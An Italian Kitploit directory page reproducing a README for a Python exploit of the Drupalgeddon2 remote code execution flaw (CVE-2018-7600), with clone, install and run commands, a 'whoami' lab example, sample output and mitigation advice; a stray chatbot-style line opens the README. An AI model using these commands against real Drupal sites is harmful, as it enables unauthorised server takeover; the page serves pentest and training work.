Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2018-7600 — Programma Python per eseguire RCE su Drupal versione 7.56 | Kitploit
Strumenti/GitHubGitHub/xxxtectationxxx/cve-2018-7600
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubxxxtectationxxx/cve-2018-7600

CVE-2018-7600

Programma Python per eseguire RCE su Drupal versione 7.56

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Pronto, Dewa, ho aggiunto anche la sezione di utilizzo a partire da git clone, quindi il README è completo. Questa è la versione finale che ti basta copiare-incollare nel README.md del tuo repository GitHub.

CVE-2018-7600 - Exploit RCE Drupalgeddon2

Questo exploit sfrutta la vulnerabilità Drupal 7.56 (e alcune versioni precedenti) nota come Drupalgeddon2.
La vulnerabilità consente Remote Code Execution (RCE) senza autenticazione, sfruttando un difetto nei form vulnerabili.

🔗 Repository: https://github.com/xxxTectationxxx/CVE-2018-7600


⚠️ Avvertenza

Questo script è creato solo a scopo didattico e per test in ambienti di laboratorio.
È vietato utilizzarlo su sistemi senza autorizzazione esplicita.


🎯 Versione Target

  • Drupal 7.x (inclusa 7.56) non ancora patchata.
  • Potrebbe funzionare anche su alcune versioni iniziali di Drupal 8.

📜 Funzionamento in Breve

  • Invio del payload all'endpoint user/password con un parametro che attiva la funzione passthru() in PHP.
  • Estrazione del form_build_id dalla risposta del server.
  • Invio di una seconda richiesta per eseguire il comando desiderato.

  • 📦 Installazione e Utilizzo

    Clona il repository:

    root@kitploit:~
    git clone https://github.com/xxxTectationxxx/CVE-2018-7600.git
    cd CVE-2018-7600
    

    Installa le dipendenze:

    root@kitploit:~
    pip install requests
    

    Esegui l'exploit:

    root@kitploit:~
    python3 drupalgeddon2.py --URL <url_target> --COMMAND "<comando>"
    

    Esempio:

    root@kitploit:~
    python3 drupalgeddon2.py --URL http://192.168.60.129 --COMMAND "whoami"
    

    💻 Esempio di Output

    root@kitploit:~
    [*] Invio del payload iniziale al target...
    [+] form_build_id trovato: form-ABC123XYZ
    [+] Output del comando:
    www-data
    

    🛡️ Mitigazione

    • Aggiorna Drupal all'ultima versione.
    • Applica le patch di sicurezza ufficiali di Drupal.
    • Limita l'accesso al server durante le correzioni.

    📚 Riferimenti

    • Drupal Security Advisory SA-CORE-2018-002
    • Exploit-DB Entry #44449

    Disclaimer: L'autore non è responsabile per l'uso improprio di questo script. Usalo con saggezza e solo su sistemi autorizzati per il test.

    Scarica lo strumento